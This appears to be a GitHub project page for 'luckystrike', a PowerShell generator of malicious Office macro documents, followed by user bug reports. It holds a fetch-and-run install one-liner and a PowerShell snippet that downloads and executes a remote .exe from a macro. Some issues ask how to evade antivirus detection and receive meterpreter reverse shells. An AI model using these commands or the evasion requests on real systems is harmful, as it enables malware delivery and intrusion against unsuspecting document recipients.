
luckystrike's Introduction

luckystrike

A PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.

Getting Started

  1. Read this: http://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator.
  2. Read the wiki!
  3. Make sure you are on a Win7-10 machine (32 or 64bit).
  4. You must be running a current version of PowerShell (v5+).
  5. You must have Microsoft Excel installed (I did my testing with 2013).
  6. From an ADMINISTRATIVE PowerShell prompt, run the following command. A luckystrike folder will be created for you.
  7. iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')
  8. Run .\luckystrike\luckystrike.ps1 (also as an administrator).

If you have a problem

  1. Run luckystrike with the -Debug switch. This will generate a debug .log file in the luckystrike directory.
  2. Reproduce the issue
  3. Take a screenshot of the error
  4. Submit a github issue with the screenshot & debug log attached.
  5. Be patient. I'm one guy. :-)

luckystrike's People

Contributors

curi0usjack, shellntel

luckystrike's Issues

Invalid DocType (table) and $script:doctype variable is never set.

It looks like the current version from the git is unusable, I've tried tracking down the error but
I couldn't really figure the root cause.

As it looks, $script:doctype is never set in this version, and it seems impossible to create a new doctype
for some reason. I've manually set $script:doctype and then tried adding a new file but got
the following error:

Invoke-SqliteQuery : Exception calling "Fill" with "1" argument(s): "SQL logic error or missing database
no such table: Assoc_Infection_DocType"
At C:\luckystrike\luckystrike\luckystrike.ps1:205 char:17

+ ... tmpoutput = Invoke-SqliteQuery -SQLiteConnection $dbConnection -Query ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-SqliteQuery

Can you take a look at it? I think I'll try using 4a05b63aed687392cffe0e14e69256df3eb1eec3
with hopes that it would just work there.

Note:
Since 1.1.7 only supports xls, the bug is fixed there, but makes it kind of less usable.
What condition sets $script:doctype to a valid one? I couldn't find it in the code.

Fail on installation of SQLite

Trying to install on Windows 10 x64 box.

I'm getting the following error:
### LUCKYSTRIKE INSTALLATION ROUTINE ###
[*] Installing\Importing Dependencies..
[*] Creating C:\work\luckystrike
[*] Downloading db.sql
[*] Creating & initializing database: C:\work\luckystrike\ls.db
Invoke-SqliteQuery : Unable to find type [DBNullScrubber].
At line:70 char:9
+         Invoke-SqliteQuery -SQLiteConnection $dbConnection -Query $in ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (DBNullScrubber:TypeName) [Invoke-SqliteQuery], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound,Invoke-SqliteQuery

Trying to get help on "Invoke-SqliteQuery : Unable to find type [DBNullScrubber]" on Google, I found... nothing??!! :(
Am I missing something obvious?

Crash when using reflectivePE

Hi,

LuckyStrike crashes when using an executable with reflectivePE infection. I'm having the attached issue. Working on Win7 32-bit.

bug

Any idea?

Thanks

installation error

Hi,

I get this error when I try to run the script. I tried both regular and admin command prompts.

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> iex (new-object net.webclient).downloadstring('https://r
aw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

### LUCKYSTRIKE INSTALLATION ROUTINE ###

[*] Installing\Importing Dependencies..
[*] Module (PSSQlite) not found, attempting to install and import.
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.co
m/Shellntel/luckystrike/master/install.ps1') : [!] Module install/import error!
Attempt to manually install PSSQlite
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n

obfuscation module

Hi, on launch the following error is given: [!] - Module Invoke-Obfuscation not installed. Obfuscation options will not be available.
Which Invoke-Obfuscation module should be used and how is it to be installed?

Thanks

Get error when opening .xls with luckystrike

Hello,

When I finished all steps and got the malicious xls file, I found that the macro threw an error: "Compile error---sub procedure or function not defined". What's going on here? Thank you!

Kaspersky heuristics

Hi Jack,

Please, could you make sense of the following:

I have an .EXE reverse_tcp payload that I run on Windows 10 x64. It does not flag Kaspersky nor Defender and I manage to open a meterpreter shell without detection.

When I infect an XLS or Word document using LUCKYSTRIKE with the same FUD EXE, Kaspersky starts to detect the XLS file as a virus. Why does it detect the XLS document but not the EXE? And is there a way around it, maybe an encryption option if possible with a domain name for EXE, like the PowerShell script option in LuckyStrike?

Thank you

seg faults

works than seg faults when i press the W key. my computer does powershell very well. can you halp me? would be cool if it could do the auto hamburger attack.

If 7-11 is open 24 hours a day, 365 days a year, why are there locks on the doors?

No payload displayed after adding it to the Catalog

Hello, after reviewing the Wiki I've added an executable payload to the catalog, but when I have to embed it inside a doc I don't see it in the payload selection menu. I confirm that it is present in the Catalog.

Exe Payload - VBA Compile Error

Saw you guys at DerbyCon and had to try this out!! Thanks for your hard work.

Was wondering if you could help with a compile error I'm getting... I installed and used luckystrike on Win10 x64 to inject an exe via disk, generating new xls file. Then I was testing opening it on Win7 x64 box using Excel 2013 (the Win10 box also had Office 2013 and is generating the same compile syntax error). But when I click enable macro, the VBA code is throwing the error. I'm not familiar with VBA - is there something I'm doing wrong? Your help is appreciated!

screen shot 2016-10-05 at 3 38 52 pm

Error occurred creating document

In Windows 10 and Windows 8.1 I have the same problem generating an Office doc with luckystrike 2.0.
Please find attached the document log.
With my best thanks

Could not find database in system32

On a fresh install on a Windows 10 VM I try to run luckystrike.ps1 and I get the following:
Could not find database at C:\Windows\system32\ls.db. Did you run the install script?

I ended up moving ls.db from C:\Windows\system32\luckystrike\ to C:\Windows\system32\
but that doesn't feel quite right.

detection runtime

The code was detected at runtime by Windows Defender; I don't know if this is so with other AVs, but it was killed at runtime. Any idea if this can be fixed?

Eng win 7 x86, office 2013, exe can't be run by any method

Well, running a shell command works, though no embedded exes can be launched.
User name is 'w7_x86' (so, nothing special). Exes I embed run with no problem when launched the straight way (through cmd or by double-clicking in explorer).

VBA Run-time error '5'

Enabling macros gives me Run-Time error '5':
Invalid procedure call or argument.

I am using the dev branch because I keep running into the out-of-memory issue.
The debug problem is shown at line "Shell (pth)".

Happens on both Save to disk and Certutil. Going to microsoft/addins, I do see both the executable file and the text file with encoded code in it.

I am using Windows 10 and Microsoft Excel 2016.

Problem embedding PowerShell Script

Hi,

For test purposes I'm trying to make luckystrike compile a .xls that downloads a remote .exe.

For doing this I'm using an external .ps1 file:


$down = New-Object System.Net.WebClient
$url = 'http://url/test/test.exe'
$file = 'test.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);


If I execute this script, it downloads and runs the .exe regularly. If I try to use it as a PowerShell command in the payload, the final .xls opens regularly in Excel but then it crashes, not downloading or opening anything.

Any suggestion? :)

Thank you :)

Payloads go Missing when attempting to Select

Having issues where it appears that I have stored a PowerShell payload within the catalog, but then it appears to go missing when trying to use that payload through the selection process. Let me know if this is a user error and not using the tool properly.

Debug output:

POWERSHELL VERSION:     5.1.14409.1005
EXCEL VERSION:          12.0
OFFICE BITNESS:
OFFICE REGKEY:          HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Outlook
WINDOWS VERSION:        6.1.7601.65536
WINDOWS BITNESS:        64-bit
ISADMIN:                True
    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/
                      /____/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 2



=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 1

Title: psempire

Target IP [Optional]:
Target Port [Optional]:
Description (e.g. empire, windows/meterpreter/reverse_tcp, etc) [Optional]:

Choose payload type:
        1) Shell Command
        2) PowerShell Script
        3) Executable
        4) COM Scriptlet
        98) Help
Selection: 2

Enter full path to .ps1 file: C:\Users\username\Desktop\PowerShell\luckystrike\test.ps1

[+] - Payload added.

=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 99



============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 1



=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 1



Please select the document type you wish to make:

        1)  xls
        2)  doc


Select: 2



=========== Select Payload =============

        99) Done.


Select:

The PS payload is stored successfully within the catalog, however it does not seem accessible when trying to select it for use.

You can see in the output below that the payload does appear to be properly stored within the catalog.

=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 3



Name     TargetIP TargetPort PayloadType
----     -------- ---------- -----------
psempire                     PowerShell Script

File Not Found

Hi @curi0usJack ,
I have installed Luckystrike on my Windows 7. I have done all the setup successfully; the only problem that I am facing right now is that I am generating a new Excel file but I am not able to find the generated file in the mentioned folder path.

image
image

Can you provide me a solution for this?

module invoke-obfuscation missing

Hello, I'm getting this message once I install and run the luckystrike module.
The log file and the screenshot are attached.

Are you able to tell me how to properly install Invoke-Obfuscation by any chance? I did git clone that repo and imported the module, but it seems not to work like this.

thanks
luckystrike_module_missing
ls-debug-08062017082020.txt
luckystrike_module_missing

exe payload not working

Hi,

I add an exe payload and create an Excel file. However, I get an error saying file not found. The file is still on my computer and the path is correct. No errors are generated by the luckystrike script. It's when I run the macro code that I get this error. I tried both the certutil and save to disk methods.

Run-time error '70': Permission denied

When generating an Empire payload, I'm running into the above error when enabling macros. Tested on a Windows 7 machine w/ Excel 2013 in the lab and it works fine, but on a Windows 10 box with Excel 2016 I'm running into the error. A basic "calc.exe" shell payload works just fine.

Edit: Super cool tool by the way. I love where you're going with it!

Generate new xls error

Hi @Shellntel,
I already installed Excel (2007)... but when I generate a new xls I get the error below:
[*] - Generating macro code.
[*] - Adding macro to workbook.
[*] - Embedding payloads into workbook.
[*] - Error occurred creating document. Could not load file or assembly 'Microsoft.Office.Interop.Excel, Version=12.0.0. of its dependencies. The system cannot find the file specified.

Please help me

Generating Error

Could you please see this:

[DBG] - PROCESS-MENUOPTIONS: SELECTION: 1
[DBG] - CREATE-WORD: LINELENGTH:
[DBG] - CREATE-WORD: ISMODIFY: False
[DBG] - CREATE-WORD: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: FILENAME:
[DBG] - DO-FILEPREREQS: DOCTYPENAME: doc
[DBG] - DO-FILEPREREQS: OFFICEVERSION: 16.0
[DBG] - DO-FILEPREREQS: POWERSHELL VERSION: 5.1.15063.502
[DBG] - DO-FILEPREREQS: OFFICE VERSION: 16.0
[DBG] - DO-FILEPREREQS: OFFICE BITNESS: x64
[DBG] - DO-FILEPREREQS: OFFICE REGKEY: HKLM:\SOFTWARE\Microsoft\Office\16.0\Outlook
[DBG] - DO-FILEPREREQS: WINDOWS VERSION: 10.0.15063.0
[DBG] - DO-FILEPREREQS: WINDOWS BITNESS: 64-bit
[DBG] - DO-FILEPREREQS: ISADMIN: True
[DBG] - DO-FILEPREREQS: DOCTYPEID: 2
Index was outside the bounds of the array.

At C:\Windows\system32\luckystrike\luckystrike.ps1:1783 char:4
+         $Word.DisplayAlerts = "wdAlertsNone"
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : OperationStopped: (:) [], IndexOutOfRangeException
    + FullyQualifiedErrorId : System.IndexOutOfRangeException

PS C:\Windows\system32\luckystrike>

Thank you

Shell command wont execute in excel file but it works when run in powershell

When I test the command in PowerShell, it works flawlessly, but when I try to create a macro or metadata with it, it doesn't work. The command I use is:

$down = New-Object System.Net.WebClient; $url = 'domain\path\file'; $file = 'file.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

how to listen metasploit

Hi everyone, I successfully installed and also created an infected .xls file. But now my problem is how to use
Metasploit or any listening mechanism which approves and receives meterpreter connections from the infected system?

I did set the following items in luckystrike:
Target IP: 10.0.0.125 (My KALI IP address)
Target Port: 35313 (My listening port on KALI that selected in PAYLOAD setting in METASPLOIT)
Description: windows/meterpreter/reverse_tcp

Please help me accomplish this.
Best Regards.

Math bug found. Parts length doesn't match numrows in legend

Hi!
I tried to generate a new xls file and got this error:
[*] - Generating macro code.
[*] - Adding macro to workbook.
[*] - Embedding payloads into workbook.
[!] - Math bug found. Parts length doesn't match numrows in legend. Run in -Debug

In debug:
[*] - Adding macro to workbook.
[DBG] - Executed Query: SELECT * FROM ActiveWorking. Params:
[*] - Embedding payloads into workbook.
[DBG] - Executed Query: SELECT * FROM Payloads WHERE ID = @id. Params: id:1
[!] - Math bug found. Parts length doesn't match numrows in legend. Run in -Debug

How can I fix this?
Thanks!

New Payload Error

Entering something other than an integer when selecting a payload type for a new payload bombs. Entered an empire launcher string by accident. Need to check var for proper type/value.

XLS template

Can you provide sample XLS template?

This would help a lot :)

System.OutOfMemoryException generating xls

[*] - Generating macro code.
[*] - Adding macro to workbook.
[*] - Embedding payloads into workbook.
Insufficient memory to continue the execution of the program.
At C:\Users\zoid\luckystrike\luckystrike.ps1:1050 char:6
+ ...             $Worksheet.Value.Cells.Item($startrow, [int]$legend.Start ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], OutOfMemoryException
    + FullyQualifiedErrorId : System.OutOfMemoryException

[+] - Success. File saved to ...

The file saves, but does not run, as the binary is incomplete. "this app can't run on your pc" if I try to run it manually from AddIns folder. Running from the macro it gives error when trying to launch file

It works with one payload, but with this one it just dies. I even tried upping my allowed memory in powershell from default to 8 gb

My memory usage doesn't change any significant amount, but cpu spikes, as it should

detected by AV

Hi, first thanks for this job. I want to let you know that it's detected by AVAST AND KASPERSKY AND NOD32. Can you implement new encrypting methods? And can you set the generated Excel output as .macro-enabled? That's better than the 2003 Office type... Thanks in advance

Script 1 error, MAJOR!!

So I have all the prerequisites for this program except for pssqlite, which this script is supposed to automatically install, but it just quits in the blink of an eye after I enter the command. Luckily I got a snapshot of the response from PowerShell. I tried to install pssqlite for PowerShell v5 manually but I couldn't find any tutorial.
Help?
screenshot_8

bypass method

Hi, how can I make the macros FUD or add my own bypass method to the payloads in lucky? Because Avast always detects all macros.
Greetings, my friend

Payload parts array is null

I have this problem when I use the cell-embed obfuscated. I generate the ps1 in Empire; I try in base64 and no base64, but the issue persists...
Thanks = )

sin titulo

sin titulo

Math Bug Found

Occurs in 1.1.7 when combining payloads. To repro, add the following cobalt strike payloads:

  1. Powershell command / Metadata attack
  2. beacon.exe (stageless) / Certutil attack

Generate file from template (calendar)

Run time error 5 when executing macro

Hi,

First of all, thank you for developing this tool and for making it so user friendly.

I am trying to attach an .exe to a .xls file using either the Save On Disk or Certutil methods. I don't have any error when I run luckystrike, however when I launch the infected .xls file and enable macro, I have the following error.

(Save on disk method here, but I have the same error with Certutil)

capture1

Debug

capture

I saw a previous issue where someone was having this error and so I went to check the AppData/Roaming/Microsoft/AddIn like you said. The .exe file is present on the directory but it is slightly smaller than the original one (115ko vs 122ko).

When I try to run it manually, I have a windows error "This app can't run on your PC". So it seems that the .exe is somehow damaged during the process and so when the macro tries to run "Shell(pth)" it fails.

I am running luckystrike on a Windows 7 VM with PS v5 and Microsoft Excel 2016 and the previous captures are from a Windows 10 Host with Microsoft Excel 2016. The same error occurs when launching the .xls file on the Windows 7 VM.

Don't hesitate to ask if you need more details to help me on this issue!

Cheers
